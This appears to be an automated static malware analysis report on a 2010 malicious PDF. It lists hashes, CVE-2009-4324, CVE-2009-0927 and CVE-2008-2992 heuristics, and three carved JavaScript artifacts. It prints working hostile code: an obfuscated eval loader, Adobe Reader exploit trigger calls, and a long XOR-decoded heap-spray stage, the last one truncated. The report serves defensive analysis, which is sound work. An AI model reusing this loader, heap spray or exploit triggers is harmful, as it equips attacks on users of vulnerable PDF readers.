Malicious PDF — malware analysis report

Static analysis result for SHA-256 7982e22dbf0fbd08…

MALICIOUS

PDF

7.1 KB Created: 2010-10-12 14:20:47 Authoring application: Bgecolemdisoginelejaci (via 092e1Vinavepleziueti)
MD5: 843b2cd7636d9198898d4b316410446f SHA-1: cddbc9b718a6830a6859ecbc4f14b63f3b65476a SHA-256: 7982e22dbf0fbd0824e20c40530125e37a889c76c2e95c3acf382254d8c13a96
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that leverages multiple known vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2008-2992) to execute embedded JavaScript. The extracted JavaScript, particularly 'page_word_xor_stage_000.js', appears to be a multi-stage exploit kit designed to download and execute further malicious content. The ML classifier also strongly indicated maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
javascript_obj0010_000.js
9831312efd52fddc921fa42b5f0524183ce37990ed0b97fffae684698b8a4b87
pdf-javascript-stream · PDF /JS object 10 at offset 0x1291 · 2403 bytes
Preview script
First 1,000 lines of the extracted script
// Stage-0 loader carved from PDF /JS object 10. The whole body is wrapped in a try/catch
// whose handler is empty, so any failure here is silent (no alert, no log entry).
var oDOJ = null;

try {

// Two-argument concatenation helper; used by d() below to rebuild a string one char at a time.
function z(pGD,bEX){return pGD+bEX};
// Step added to the recursion counter in hWB.prototype.dOJ.
var hSN=1;
// Property names are assembled from fragments so "length" and "replace" never appear verbatim.
var mTCZ="leng"+"th";
var pMH=String("repla"+"ce");
var jGZ=0;
// Constructor: stores its argument (the `this` context captured below) under two aliases, pYB and l.
// The second-stage artifact listed in this report reads this.pYB and this.l to reach the same context.
function hWB(zKF){this.pYB=this.l=zKF};


// Top-level `this` of the PDF JavaScript action — presumably the document/global object; verify against the Reader JS model.
var lUV=this;
// Recursion depth at which dOJ finally hands the decoded string to eval (see prototype below).
var zAD=300;
// Second-stage source with noise characters (q, &, %, ~) interleaved between the real characters.
// gHID below is the character class that strips them.
var jCDO="va&r& &y~T&K~Vq=qtqh%i~s%.qlq;~tq=%\'&gqe&t~P~a%g&e~N~\'%;~l&W~L%=~t%+~\'&t&hqW%o&r~dq\'~;%n~WqV%=~t%+q\'qu~mqW%o%r~d~s&\'q;qp%QqZq=~\'~p&aqg%e~N%u~m~\'~;qj&WqFq ~=q ~9~3& q;%x~Y~R~=%\'%\'q;&n&E&J&=~\'&j&o~i%n~\'~;qlqE&L~=&\'&\'%;&j~G%Z~=~0q;&b&C~D~=~Sqt&r~i&nqg&;~p%U&Fq=%\'&squ%b%s%tqr&\'~;qj~M%P&=q\'qeqv%a%l~\'~;&m&T~C&Zq=~\'&l~e&nqg&tqhq\'q;~p&GqL~=%\'q\\q\\qx&\'q;%p%E&Rq=q\'&t&o~Sqtqr&i%nqgq\'%;%z&K~R&=~\'qp%a&rqsqe&I&n%t&\'&;~r%A&R~=~\'%f~r~o~m%C~h~a~r&C&o&d&e~\'&;&v&G~N~=&\'qc%h~a~rqC~o&d~e%Aqt&\'~;&h%S%Nq=&4q/&4q;ql~W%R%=~1&+&4~;qhqQ&Nq=&2q0~0~+q5%5~;ql~U%Vq=q\'%dqo~c&\'~;%lqYqL&=~3&3&2q;qh&W~Rq=&[q]%;qh&Y%N%=&\'q\'%;%fqC~Bq=~1q6q;&h~W&V%=&2q;~k~J~G~X~=q4~;~n%W%V&M~=&yqT&K&V~[~n%W&V~]q(%y&T%K~V%[&pqQ%Z%]&)&;&f~o~rq(%l%O~=&j&G&Z&;%l&O&<q ~n&WqV&M~;% ~l~O~+&+q)q{qv%a%r& %wqR~W~B%=%y%T%K%V~[%l%W&L&]q(&y~T%K&Vq[&p~QqZ%]~,~lqO&,qt~r%uqe%)~;&l~E&Lq=%[ql~EqL&,&w~RqWqBq]q[&nqEqJ&]%(&x~Y&Rq)%;%;%}qf~o%r%(%l~O~=&0%;&l~Oq ~<& ql%E&L~[~mqTqC~Z~]q;& &l&Oq+~=qh%W%Vq)%{&f~=~l~EqL&[&p&UqF%]~(%l~O%,~h%WqV%)&;~v%=~p~a%r~s%e&I~nqt&(%f~,qf%C~B~)&;qp%Q%B~=%v%^qj~W%F&;~z%SqR&=&pqQ&B~.&t%o~S%t&r~i&nqgq(&f~CqB&)q;%zqS%R%=~(qz%S%Rq[qm&T&C~Z&]~=&=~h&S~N~)q q?& ~\'%0%\'% ~+& qz~S&R& &:q &z~S~R%;&h%W~R%.%p%u%s&h%(&zqS&R%)&;q}%t%r&y~ q{~h&Y~Nq=~n%e%wq qS~t%r%i%n&g~(qp%G~Lq &+& ~h&WqR&[%n&EqJ~]%(%p~G&Lq)%)%;qa%p&p~[qj%M&P%]%(%\'~h&Y~N%=%\"%\'~+&h&Y&N&+%\'%\"%;~\'&)%;qy%T~KqV%.~xqA%L~=%(%hqY&N~[&p~U&Fq]~(qhqY~N&[~m&TqC~Zq]~-ql%Y~L&)~)%;&yqT%K~V%.~bqCqT&=&(%h&Y~Nq[~pqUqFq]%(&j%G~Zq,qh&Y%N&[&m~T~C%Z%]&-%l~Y%Lq)&)q;%f~M~H&(&)%;~}% ~cqa%t%c&h%(&h%MqJq)~{qiqfq(qy&TqK&V&.~b&C&T~)&{&t~r%y~ &{%a%p&p%[%jqMqP~]q(~y%T%KqVq.&bqC~Tq)~;&}% %c&a~t~c~hq(&h~MqJq)~{%aqpqp~.%a%l~e%r&tq(qh&MqJ~)~;&}~}q %e%l~s&e% %{&a&p~pq.&a%l%e~r%t%(%\'qN~O~ &CqO%D%E%\'~)~;q}&}q";
// Empty string; doubles as the replacement value when stripping noise and as the accumulator seed in d().
var xYR='';
// Character class of the noise bytes inserted into jCDO.
var gHID=/[q&%~]/g;
// "Function" — built from fragments but never referenced in this stage.
var xS=String("Func"+"tion");
// "charAt" as a String object; used as a computed property name in d().
var eTWN=new String("ch"+"ar"+"At");
;


// Reverses a string: walks lO from rMJ.length down to 0, appending charAt(lO) to zSD.
// The first iteration (index === length) yields '' and is harmless. zSD and lO are
// assigned without var and therefore leak into the enclosing scope.
function d(rMJ){zSD=xYR; for(lO=rMJ[mTCZ];lO >= jGZ;lO--) zSD=z(zSD, rMJ[eTWN](lO)); return zSD}


// Strip the noise characters to recover the real second-stage source text.
jCDO=jCDO[pMH](gHID, xYR);
// d("lave") === "eval": the interpreter entry point is spelled backwards so a plain
// search for "eval" in the stream misses it. jMP is assigned without var (implicit global).
jMP=d(new String("lav"+"e"));

;


hWB.prototype={

// Recurses hSN at a time from fKZ up to zAD (300), then invokes eval on the decoded
// string through the stored context (this.l). The deep recursion does no useful work;
// it looks like a delay / anti-emulation step — an assumption, not provable from this stage.
// Note the recursive call goes through the module-level oDOJ instance rather than `this`.
dOJ : function(fKZ){

if(fKZ > zAD){

this.l[jMP](jCDO);

} else {

oDOJ.dOJ(fKZ+hSN);

}
}
};

// Instantiate with the captured context and kick off the counter at 0.
var oDOJ=new hWB(lUV);
oDOJ.dOJ(jGZ);

} catch(hYN){
// Deliberately empty: every error, including a failed eval of the decoded stage, is swallowed.
}
legacy_pdfkit_stage_000.js
18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52
deobfuscated-js · getPageWords-XOR Pidief stage normalized at offset 0x0 · 153 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords-XOR Pidief stage normalized */
// Analyzer-normalized form of the stage (the artifact label above says "normalized"):
// one representative call per Adobe Reader API sink named in this report's heuristics.
// Do not read it as the verbatim recovered stage.
// Viewer-version read: the Pidief template branches on this value to pick the matching exploit path (PDF_PIDIEF_MULTI_CVE_DISPATCH).
app.viewerVersion;
// Sink for CVE-2009-0927 — stack buffer overflow in Collab.getIcon() with a crafted argument (see heuristic above).
Collab.getIcon("N."+unescape("%09"));
// Sink for CVE-2009-4324 — use-after-free in the multimedia plugin triggered by media.newPlayer() (see heuristic above).
media.newPlayer(null);
// Sink for CVE-2008-2992 — stack buffer overflow in util.printf() via an oversized field-width format string (see heuristic above).
util.printf("%45000f", 1);
page_word_xor_stage_000.js
444f6419aa3ad11f5771853dfe35a7533b9a7394226c729ffe069624be3b11f0
deobfuscated-js · page-word continuous-hex XOR decoded JavaScript (decompressed, key=0x5D) at offset 0x8C · 6786 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 3 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
var hCN="\x03\x55\x01\x03\x0c\x57\x03\x54\x5a\x5b\x59\x03\x05\x56\x55\x04\x54\x5d\x59\x58\x5b\x5c\x09\x0a\x57\x45\x49\x44\x12\x46\x42\x13\x44\x1c\x4a\x4a\x79\x20\x76\x27\x27\x24\x7f\x29\x2f\x78\x7b\x2e\x7e\x7b\x7f\x62\x61\x62\x37\x30\x6d\x63\x6f\x6e\x38\x68\x18\x4b\x09\x3b\x1e\x0f\x1e\x5f\x10\x40\x1e";var bQR="\x33\x64\x33\x30\x38\x62\x35\x63\x62\x62\x38\x61\x66\x32\x30\x62\x33\x35\x30\x32\x30\x30\x64\x64\x38\x35\x38\x36\x61\x32\x37\x65";var zYJ=this.l.info[hGX("\x54\x3c")].replace(/[\s]/g, xYR);var fSX=app;var lUV=this.pYB;fSJ=hGX("\x57\x01\x51\x45\x5f");rOB=hGX("\x5a\x0a\x55\x5f");nAX=hGX("\x43\x16\x5c\x54\x4d\x01\x50\x11");bMN=hGX("\x41\x0b\x46\x5e\x5c");fOJ=hGX("\x5a\x0a\x57\x55\x40\x2d\x53");rQR=hGX("\x52\x11\x47\x58\x57\x10");hQH=hGX("\x47\x0d\x47\x5c\x5d");tYL=hGX("\x40\x14\x5f\x59\x4c");pMH=hGX("\x41\x01\x43\x5c\x59\x01\x50");nQT=hGX("\x43\x05\x41\x43\x5d\x24\x59\x0c\x03\x16");tAH=hGX("\x45\x0d\x56\x47\x5d\x10\x63\x06\x10\x11\x51\x0e\x08");var hIV=this.l;var rMV = hIV[rOB];var pOP = (rMV[nAX][pUF](jGZ,lWR) == fSJ);if(pOP){ fSX.alert(hGX("\x77\x21\x71\x65\x7f\x42\x5c\x10\x42\x2d\x76"));}var nAXA=Date;var qLIH=Math;var x=util;var xAL= hIV.xAL;var hCH=hGX("\x16\x11");var rOP=hGX("\x6c\x3b\x6c\x6f\x67");var tWH=hGX("\x5e\x01\x57\x59\x59");var bOV=hGX("\x5d\x01\x44\x60\x54\x03\x4c\x06\x10");var hSV=hGX("\x40\x11\x51\x43\x4c\x10\x5c\x0d\x05");var hOB=hGX("\x43\x16\x5a\x5e\x4c\x06");var tWD = hGX("\x0c");var pEN = hGX("\x15");var dGD = hGX("\x0e");var xQL = hGX("\x41\x01\x52\x54\x5d\x10\x6a\x15\x07\x10\x4b\x08\x09\x5c");var hCT = hGX("\x56\x1c\x5d");var dWD = true;var vAF = true;var xUD = true;if(!hIV.xAL) { rOD();};function bQJ(tAT){ var pIT = hYZ(); var jUF = nYB(); var zYZ = bOP(); jUF=rSR(jUF, zYZ, tAT); var vCV = bQN(jUF, pIT); xAL = hGX(xAL); xAL = xAL[pMH](rOP, pIT); xAL = xAL + vCV; return bCR(jAT(xAL));};function nYB(){ var rMJ = (rMV[rQR] + rMV[hQH])[pMH](/[\s]/g, xYR); var nKZ = xWN(rMJ, zYJ, hGX(hCN)); return nKZ;};function tKL(jUJ,zGB){ 
while(jUJ.length * hWV < zGB){ jUJ += jUJ; } jUJ = jUJ[hSV](jGZ, zGB / hWV); return jUJ;};function vWT(){ function pID() { var rMJ=hGX("\x43\x24\x02\x01\x09\x53\x04\x52\x53\x53\x09\x50\x57\x03\x01\x53\x02\x04\x01\x03\x01\x01\x55\x55\x09\x04\x18\x0c\x41\x4b\x4e\x1c\x4a\x55\x02\x01"); x[hOB](rMJ, new nAXA()); } var vEL=(12000); fUX=new Array(); var pKR = hGX("\x16\x11\x0a\x00\x01\x52\x10\x16\x5b\x52\x01\x51"); pKR=bCR(pKR); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5a\x4f\x56\x0b\x53\x52\x6d\x02")); while(pKR.length <= (0x8000)){ pKR+=pKR; } pKR=pKR.substr(jGZ, (0x8000) - jUJI[mTCZ]); for(lO=jGZ; lO < vEL; lO++) { fUX[lO]=pKR + jUJI; } if(vEL){ pID(); pID(); try { hIV[tWH][bOV](null); } catch(e) {} pID(); }};function aFOR(){ var j = hGX("\x16\x11\x03\x71\x08\x23\x10\x16\x52\x23\x08\x20"); var hOR = hGX("\x16\x50\x06\x00\x08\x52\x53"); var zIT=hGX("\x43\x16\x5a\x5e\x4c\x04"); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5b\x4f\x50\x01\x58\x54")); var pAJ=bCR(j + j); var vKV = pAJ + jUJI; var xAF = bCR(j); var dYV = (20); var tKL=dYV + vKV[mTCZ]; while(xAF.length < tKL){ xAF += xAF; } var dCD=xAF[hSV](jGZ,tKL); var nOB=xAF[hSV](jGZ,xAF[mTCZ] - tKL); while(nOB.length + tKL < (0x40000)){ nOB =nOB + nOB + dCD; } var nOJ=new Array(); for(var lO=jGZ; lO < (1400); lO++){ nOJ[lO] = nOB + vKV; } var nMJ=xYR; for(var lO=jGZ; lO < (296); lO++){ nMJ+=hGX("\x0a"); } nMJ = jYN(nMJ); x[zIT](hOR, nMJ);};function tQB(){ var s=xYR; var nED=hGX("\x70\x0b\x5f\x5c\x59\x00"); var tGJ=hGX("\x54\x01\x47\x79\x5b\x0d\x5b"); if(hIV[nED][tGJ]) { var nOJ=new Array(); var jUJI=bQJ(hGX("\x70\x32\x76\x1d\x0a\x52\x05\x5a\x4f\x52\x01\x53\x51")); var hEN=(0x400000); var vYN=jUJI[mTCZ] * hWV; var zGB = hEN - (vYN + (0x38)); var xEN=bCR(hGX("\x16\x11\x0a\x00\x01\x52\x10\x16\x5b\x52\x01\x51")); xEN=tKL(xEN, zGB); var nYD=((0x0c0c0c0c) - hEN) / hEN; for(var lO=jGZ; lO < nYD; lO++){ nOJ[lO]=xEN + jUJI; } var pUL=unescape(hGX("\x16\x54\x0a")); while(pUL.length < (0x4000)){ pUL+=pUL; } 
pUL=hGX("\x7d\x4a") + pUL; hIV[nED][tGJ](pUL); } else { }};function lEL(){ var zYZ = bOP(); if(dWD && ((zYZ >= (9) && zYZ < (9
... (truncated)